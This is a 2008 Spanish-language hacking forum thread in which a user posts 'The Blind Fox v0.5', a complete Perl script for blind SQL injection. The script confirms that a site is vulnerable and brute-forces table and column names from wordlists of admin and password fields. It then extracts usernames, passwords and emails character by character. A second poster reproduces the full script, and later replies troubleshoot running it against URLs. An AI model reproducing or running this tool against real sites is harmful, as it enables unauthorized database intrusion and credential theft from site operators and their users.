elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  The Blind Fox v0.5 | By Login-Root
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: The Blind Fox v0.5 | By Login-Root  (Leído 4,712 veces)
Login-Root

Desconectado Desconectado

Mensajes: 37


Trust your technolust


Ver Perfil
The Blind Fox v0.5 | By Login-Root
« en: 4 Octubre 2008, 22:38 pm »

Es semejante a la SQL-PwnZ pero para Inyecciones a ciegas (Blind SQL Inyection). Esta en etapa hiperbeta asi que no se asombren si les sale algunos errores inexplicables xD.

blindfox.pl
Código:
#!/usr/bin/perl

###########################################################################################
#                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
###########################################################################################

###########################################################################################
# [+] inf0:                                                                             ###
###########################################################################################
# Busca:                                                                                ###
# ======                                                                                ###
#  - Checkeo AND 1=1 && AND 1=0                                                         ###       
#  - Information_Schema && MySQL.User                                                   ###
#  - Tablas                                                                             ###                                               
#  - Columnas                                                                           ###
#  - Extrae valores de las tablas (Opcional)                                            ###
#                                                                                       ###
#  ...y guarda todo en un archivo de texto.                                             ###
#                                                                                       ###
###########################################################################################

###########################################################################################
# [+] Use:                                                                              ###
###########################################################################################
# perl blindfox.pl [WEBSITE] [PATRON] [FILE] [-EXT]                                     ###
#   [WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)            ###
#   [PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0                ###
#   [FILE]:    Archivo donde guardar informe                                            ###
#   [-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)              ###
###########################################################################################

###########################################################################################
# [+] c0ntact:                                                                          ###
###########################################################################################
# MSN:    no.more@passport.com                                                          ###
# Jabber: login-root@x23.eu                                                             ###
# E-Mail: login_root@yahoo.com.ar                                                       ###
###########################################################################################

###########################################################################################
# [+] sh0utz:                                                                           ###
###########################################################################################
# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
# Many thanks to boER, who teach me a little of perl ;D                                 ###
# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###
###########################################################################################

use LWP::Simple;

if(!$ARGV[2])
{
print "\n\n-[+]- The Blind Fox v0.5 | By Login-Root -[+]-\n==============================================";
print "\n\nUso: perl $0 [WEBSITE] [PATRON] [FILE] [-EXT]\n";
print "\n[WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)\n[PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0\n[FILE]:    Archivo donde guardar informe\n[-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)\n\n";
exit (0);
}

sub end()
{
print WEB "\n\n\n[*EOF*]";
    print "\n\n[+] Todo salvado correctamente en $ARGV[2]\n\n";
    print "## c0ded by Login-Root | 2008 ##\n\n";
    exit (0); 
}   


@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  'name','names','nombre','nombres','member','members','admin_table',
  'miembro','miembros','membername','admins','administrator','sign',
  'administrators','passwd','password','passwords','pass','Pass',
  'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
  'member_password','mods','mod','moderators','moderator','user_email',
  'user_emails','user_mail','user_mails','mail','emails','email','address',
  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin',
  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

if ( $ARGV[0]   !~   /^http:/ )
  {
      $ARGV[0] = "http://" . $ARGV[0];
  }

open(WEB,">>".$ARGV[2]) || die "\n\n[-] Imposible crear el archivo de texto\n";
print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
print "\n[!] Chequeando por el patron...\n";
      $sql=$ARGV[0]." AND 1=1";
      $response=get($sql);
      if($response =~ /$ARGV[1]/)
        {
            print "\n[+] Patron encontrado con AND 1=1\n";
            print WEB "$sql => OK !\n";
            $sql=$ARGV[0]." AND 1=0";
            $response=get($sql);
            if($response =~ /$ARGV[1]/)
            {
            print "[-] Patron encontrado tambien con AND 1=0, posiblemente no vulnerable a Blind SQL Inyection, probar con otro patron\n";
            exit (0);
            }
            else
            {
            print "[+] Patron no encontrado con AND 1=0, website vulnerable a Blind SQL Inyection\n";
            print WEB "$sql => OK !\n";
            }
         }
         else
          {
          print "[-] Patron no encontrado, probar con otro\n";
          exit (0);
          }
        print "\n[!] Chequeando si existe Information_Schema...";
        $sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
        $response=get($sql);
         if($response =~ /$ARGV[1]/)
          {
          print "\n[+] Information_Schema disponible...guardando en $ARGV[2]";
                print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
           
          }
         else
          {
            print "\n[-] Information_Schema no disponible";
          }
        print "\n[!] Chequeando si existe MySQL.User...";
        $sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
        $response=get($sql);
         if($response =~ /$ARGV[1]/)
          {
          print "\n[+] MySQL.User disponible...guardando en $ARGV[2]";
                print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
           
          }
         else
          {
            print "\n[-] MySQL.User no disponible";
          }
        print "\n\n[!] Bruteando tablas...";
        print WEB "\n\n[TABLAS]:\n\n";
        foreach $tabla(@nombretabla)
         {
                  chomp($tabla);
                  $sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
                  $response=get($sql);
                  if($response =~ /$ARGV[1]/)
                    {
                        print "\n[+] La tabla $tabla esta disponible...guardando en $ARGV[2]";
                        print WEB "$sql\n";
                    }
                }
        print "\n\n[!] Tabla a la cual brutear columnas: ";
            $tabla.=<STDIN>;
            chomp($tabla);
            print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
            foreach $columna(@nombrecolumna)
            {
             chomp($columna);
             $sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
             $response=get($sql);
             if ($response =~ /$ARGV[1]/)
                  {
                      print "[+] La columna $columna esta disponible...guardando en $ARGV[2]\n";
                      print WEB "$sql\n";
                  }
            }
         if ($ARGV[3] =~ /-EXT/)
         {
          extrac:
          $columna = '';
          print "\n[!] Columna de la tabla $tabla a la cual extraer campos: ";
          $columna.=<STDIN>;
            chomp($columna);
          print "[!] Extrayendo valores de la tabla $tabla y columna $columna (puede demorar mucho tiempo)...\n\n";
          print WEB "\n\n[Valores de la tabla $tabla y columna $columna]:\n\n";
          $search = 1;
          $posicion = 1;
          $limit = 0;
          $comprob = 1;
          while ($search <= 255)
          {
          $sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna. " FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
          $response=get($sql);
          if ($response =~ /$ARGV[1]/)
                  {
                    $char = chr($search);
                    print WEB "$char";
                    print "$char";
                      $search = 0;
                      $posicion++;
                      $comprob++;
                  }
                 if ($search == 255)
                 {
                  print "\n";
                  print WEB "\n";
                  if ($comprob == 1)
                  {
                  $eleccion = '';
                  print "[+] Busqueda finalizada. Desea extraer valores de otra columna? [Y/N]: ";
                  $eleccion.=<STDIN>;
                  chomp($eleccion);
                  if ($eleccion =~ /Y/)
                  {
                  goto extrac;
                  }
                  else
                  {
                     end();
                  }
                  }
                  $comprob = 1;
                  $search = 0;
                    $limit++;
                 }
          $search++;
            }
           }
end();

Ejemplo de uso:



Texto de salida:



Dos cosas importantes a tener en cuenta, primero la web se debe ingresar con un numero valido (Por ejemplo http://www.web.com/index.php?id=4875) no dejen vacio el campo id (o el que fuera) porque sino no va a funcionar.
Otro punto importante, el patron es aquel texto que es visible (que existe) cuando ingresamos a la web de la siguiente manera =>
http://www.web.com/index.php?id=4875 AND 1=1 y que NO es visible (no existe) cuando ingresamos con un AND falso =>
http://www.web.com/index.php?id=4875 AND 1=0

Espero que entiendan, cualquier cosa, comentan.


ACTUALIZACIÓN v0.5:

  • Ahora se puede extraer valores de las tablas (usuarios, passwords, mails, etc.)


« Última modificación: 12 Octubre 2008, 01:00 am por Login-Root » En línea

8-Bit
Login-Root

Desconectado Desconectado

Mensajes: 37


Trust your technolust


Ver Perfil
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #1 en: 11 Octubre 2008, 23:48 pm »

ACTUALIZACIÓN v0.5:

  • Ahora se puede extraer valores de las tablas (usuarios, passwords, mails, etc.)

____________






Ahora si pueden extraer valores, ya que mucha gente me lo pidió. Por favor comenten ya que tarde bastante en codearlo y pensarlo :P.

NO DEFACEEN LA WEB DE PRUEBA, NO SEAN LAMMERS.

Saludos.


« Última modificación: 12 Octubre 2008, 01:01 am por Login-Root » En línea

8-Bit
Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #2 en: 11 Octubre 2008, 23:50 pm »

Disculpa yo no conozco de PERL pero para que funciona este programa... se ve interesante ^^
En línea

Login-Root

Desconectado Desconectado

Mensajes: 37


Trust your technolust


Ver Perfil
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #3 en: 12 Octubre 2008, 00:05 am »

Busca acerca de Blind MySQL Inyection  ;D


Saludos.
En línea

8-Bit
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #4 en: 18 Octubre 2008, 09:22 am »

Login, cierto que te elimine :xD podes arreglar cuando por ejemplo pones http://www.site.com/index.php?user=guest&variable=1
Para que el script no te tome el "&" como una linea de comandos, se puede hacer?
En línea

[/url]
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #5 en: 18 Octubre 2008, 09:26 am »

Código
  1. #!/usr/bin/perl
  2.  
  3. ###########################################################################################
  4. #                           -[+]- The Blind Fox v0.5 | By Login-Root -[+]-              ###
  5. ###########################################################################################
  6.  
  7. ###########################################################################################
  8. # [+] inf0:                                                                             ###
  9. ###########################################################################################
  10. # Busca:                                                                                ###
  11. # ======                                                                                ###
  12. #  - Checkeo AND 1=1 && AND 1=0                                                         ###        
  13. #  - Information_Schema && MySQL.User                                                   ###
  14. #  - Tablas                                                                             ###                                                
  15. #  - Columnas                                                                           ###
  16. #  - Extrae valores de las tablas (Opcional)                                            ###
  17. #                                                                                       ###
  18. #  ...y guarda todo en un archivo de texto.                                             ###
  19. #                                                                                       ###
  20. ###########################################################################################
  21.  
  22. ###########################################################################################
  23. # [+] Use:                                                                              ###
  24. ###########################################################################################
  25. # perl blindfox.pl [WEBSITE] [PATRON] [FILE] [-EXT]                                     ###
  26. #   [WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)            ###
  27. #   [PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0                ###
  28. #   [FILE]:    Archivo donde guardar informe                                            ###
  29. #   [-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)              ###
  30. ###########################################################################################
  31.  
  32. ###########################################################################################
  33. # [+] c0ntact:                                                                          ###
  34. ###########################################################################################
  35. # MSN:    no.more@passport.com                                                          ###
  36. # Jabber: login-root@x23.eu                                                             ###
  37. # E-Mail: login_root@yahoo.com.ar                                                       ###
  38. ###########################################################################################
  39.  
  40. ###########################################################################################
  41. # [+] sh0utz:                                                                           ###
  42. ###########################################################################################
  43. # In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion                 ###
  44. # Many thanks to boER, who teach me a little of perl ;D                                 ###
  45. # VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.SPAM(75)                    ###
  46. ###########################################################################################
  47.  
  48. use LWP::Simple;
  49.  
  50. if(!$ARGV[2])
  51. {
  52. print "\n\n-[+]- The Blind Fox v0.5 | By Login-Root -[+]-\n==============================================";
  53. print "\n\nUso: perl $0 [WEBSITE] [PATRON] [FILE] [-EXT]\n";
  54. print "\n[WEBSITE]: http://www.web.com/index.php?id=4875 (Poner un numero valido)\n[PATRON]:  Patron que exista con AND 1=1 y que no exista con AND 1=0\n[FILE]:    Archivo donde guardar informe\n[-EXT]:    Para extraer nombres de usuarios, passwords, etc (Opcional)\n\n";
  55. exit (0);
  56. }
  57.  
  58. sub end()
  59. {
  60. print WEB "\n\n\n[*EOF*]";
  61.    print "\n\n[+] Todo salvado correctamente en $ARGV[2]\n\n";
  62.    print "## c0ded by Login-Root | 2008 ##\n\n";
  63.    exit (0);  
  64. }    
  65.  
  66.  
  67. @nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  68.  'name','names','nombre','nombres','member','members','admin_table',
  69.  'miembro','miembros','membername','admins','administrator','sign',
  70.  'administrators','passwd','password','passwords','pass','Pass',
  71.  'tAdmin','tadmin','user_password','usuarios','user_passwords','user_name','user_names',
  72.  'member_password','mods','mod','moderators','moderator','user_email',
  73.  'user_emails','user_mail','user_mails','mail','emails','email','address',
  74.  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  75.  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  76.  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
  77.  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  78.  'sistema_usuario','sistema_password','contraseña','auth','key','senha','signin',
  79.  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','club_authors',
  80.      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
  81.      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup',
  82.      'associated','accnt','customers','customer','membres','administrateur','utilisateur',
  83.      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users',
  84.      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
  85.  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  86.  
  87. @nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  88.          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  89.          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','user_login',
  90.          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  91.          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  92.          'user_pwd','u_pass','clave','usuario','contraseña','pas','sistema_password','autor','upassword','web_password','web_username');
  93.  
  94. if ( $ARGV[0]   !~   /^http:/ )
  95.  {
  96.      $ARGV[0] = "http://" . $ARGV[0];
  97.  }
  98.  
  99. open(WEB,">>".$ARGV[2]) || die "\n\n[-] Imposible crear el archivo de texto\n";
  100. print WEB "[WEBSITE]:\n\n$ARGV[0]\n";
  101. print "\n[!] Chequeando por el patron...\n";
  102.      $sql=$ARGV[0]." AND 1=1";
  103.      $response=get($sql);
  104.      if($response =~ /$ARGV[1]/)
  105.        {
  106.            print "\n[+] Patron encontrado con AND 1=1\n";
  107.            print WEB "$sql => OK !\n";
  108.            $sql=$ARGV[0]." AND 1=0";
  109.            $response=get($sql);
  110.            if($response =~ /$ARGV[1]/)
  111.            {
  112.             print "[-] Patron encontrado tambien con AND 1=0, posiblemente no vulnerable a Blind SQL Inyection, probar con otro patron\n";
  113.             exit (0);
  114.            }
  115.            else
  116.            {
  117.             print "[+] Patron no encontrado con AND 1=0, website vulnerable a Blind SQL Inyection\n";
  118.             print WEB "$sql => OK !\n";
  119.            }
  120.         }
  121.         else
  122.         {
  123.         print "[-] Patron no encontrado, probar con otro\n";
  124.         exit (0);
  125.         }
  126.        print "\n[!] Chequeando si existe Information_Schema...";
  127.        $sql=$ARGV[0]." AND (SELECT Count(*) FROM information_schema.tables)";
  128.        $response=get($sql);
  129.         if($response =~ /$ARGV[1]/)
  130.         {
  131.         print "\n[+] Information_Schema disponible...guardando en $ARGV[2]";
  132.                print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";
  133.  
  134.         }
  135.         else
  136.         {
  137.             print "\n[-] Information_Schema no disponible";
  138.         }
  139.        print "\n[!] Chequeando si existe MySQL.User...";
  140.        $sql=$ARGV[0]." AND (SELECT Count(*) FROM mysql.user)";
  141.        $response=get($sql);
  142.         if($response =~ /$ARGV[1]/)
  143.         {
  144.         print "\n[+] MySQL.User disponible...guardando en $ARGV[2]";
  145.                print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";
  146.  
  147.         }
  148.         else
  149.         {
  150.             print "\n[-] MySQL.User no disponible";
  151.         }
  152.        print "\n\n[!] Bruteando tablas...";
  153.        print WEB "\n\n[TABLAS]:\n\n";
  154.        foreach $tabla(@nombretabla)
  155.         {
  156.                  chomp($tabla);
  157.                  $sql=$ARGV[0]." AND (SELECT Count(*) FROM ".$tabla.")";
  158.                  $response=get($sql);
  159.                  if($response =~ /$ARGV[1]/)
  160.                    {
  161.                        print "\n[+] La tabla $tabla esta disponible...guardando en $ARGV[2]";
  162.                        print WEB "$sql\n";
  163.                    }
  164.                }
  165.        print "\n\n[!] Tabla a la cual brutear columnas: ";
  166.            $tabla.=<STDIN>;
  167.            chomp($tabla);
  168.            print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
  169.            foreach $columna(@nombrecolumna)
  170.            {
  171.             chomp($columna);
  172.             $sql=$ARGV[0]." AND (SELECT Count(".$columna.") FROM ".$tabla.")";
  173.             $response=get($sql);
  174.             if ($response =~ /$ARGV[1]/)
  175.                  {
  176.                      print "[+] La columna $columna esta disponible...guardando en $ARGV[2]\n";
  177.                      print WEB "$sql\n";
  178.                  }
  179.            }
  180.         if ($ARGV[3] =~ /-EXT/)
  181.         {
  182.         extrac:
  183.         $columna = '';
  184.         print "\n[!] Columna de la tabla $tabla a la cual extraer campos: ";
  185.         $columna.=<STDIN>;
  186.            chomp($columna);
  187.         print "[!] Extrayendo valores de la tabla $tabla y columna $columna (puede demorar mucho tiempo)...\n\n";
  188.         print WEB "\n\n[Valores de la tabla $tabla y columna $columna]:\n\n";
  189.         $search = 1;
  190.         $posicion = 1;
  191.         $limit = 0;
  192.         $comprob = 1;
  193.         while ($search <= 255)
  194.         {
  195.         $sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna. " FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
  196.         $response=get($sql);
  197.         if ($response =~ /$ARGV[1]/)
  198.                  {
  199.                    $char = chr($search);
  200.                    print WEB "$char";
  201.                    print "$char";
  202.                      $search = 0;
  203.                      $posicion++;
  204.                      $comprob++;
  205.                  }
  206.                 if ($search == 255)
  207.                 {
  208.                 print "\n";
  209.                 print WEB "\n";
  210.                 if ($comprob == 1)
  211.                 {
  212.                 $eleccion = '';
  213.                 print "[+] Busqueda finalizada. Desea extraer valores de otra columna? [Y/N]: ";
  214.                 $eleccion.=<STDIN>;
  215.                 chomp($eleccion);
  216.                 if ($eleccion =~ /Y/)
  217.                 {
  218.                 goto extrac;
  219.                 }
  220.                 else
  221.                 {
  222.                   end();
  223.                 }
  224.                 }
  225.                 $comprob = 1;
  226.                 $search = 0;
  227.                    $limit++;
  228.                 }
  229.         $search++;
  230.            }
  231.           }
  232. end();

Se entiende mas.
En línea

[/url]
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #6 en: 18 Octubre 2008, 18:39 pm »

cuando vos keres interpretar el & en la consola , tenes q ponerle un ^ antes
kedaria como ^&

http://www.site.com/index.php?user=guest^&variable=1

saludos
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #7 en: 18 Octubre 2008, 18:40 pm »

QUE PELOTUDO!, pq no pense en eso? >_>
muchas gracias
En línea

[/url]
Hadess_inf
Desesperado
Colaborador
***
Desconectado Desconectado

Mensajes: 2.048


Nueva Vida


Ver Perfil WWW
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #8 en: 18 Octubre 2008, 19:11 pm »

Que mamada .. al parecer con esto tienes toda la BD. Es decir que cualquier pagina con base de datos es vulnerable a esto?


 :o :o :o :o
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: The Blind Fox v0.5 | By Login-Root
« Respuesta #9 en: 19 Octubre 2008, 02:25 am »

Que mamada .. al parecer con esto tienes toda la BD. Es decir que cualquier pagina con base de datos es vulnerable a esto?


 :o :o :o :o
si es vulnerable a sql si , si no lo es no
saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
como añadir root al login
GNU/Linux
desna 5 3,052 Último mensaje 12 Febrero 2014, 21:15 pm
por desna
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines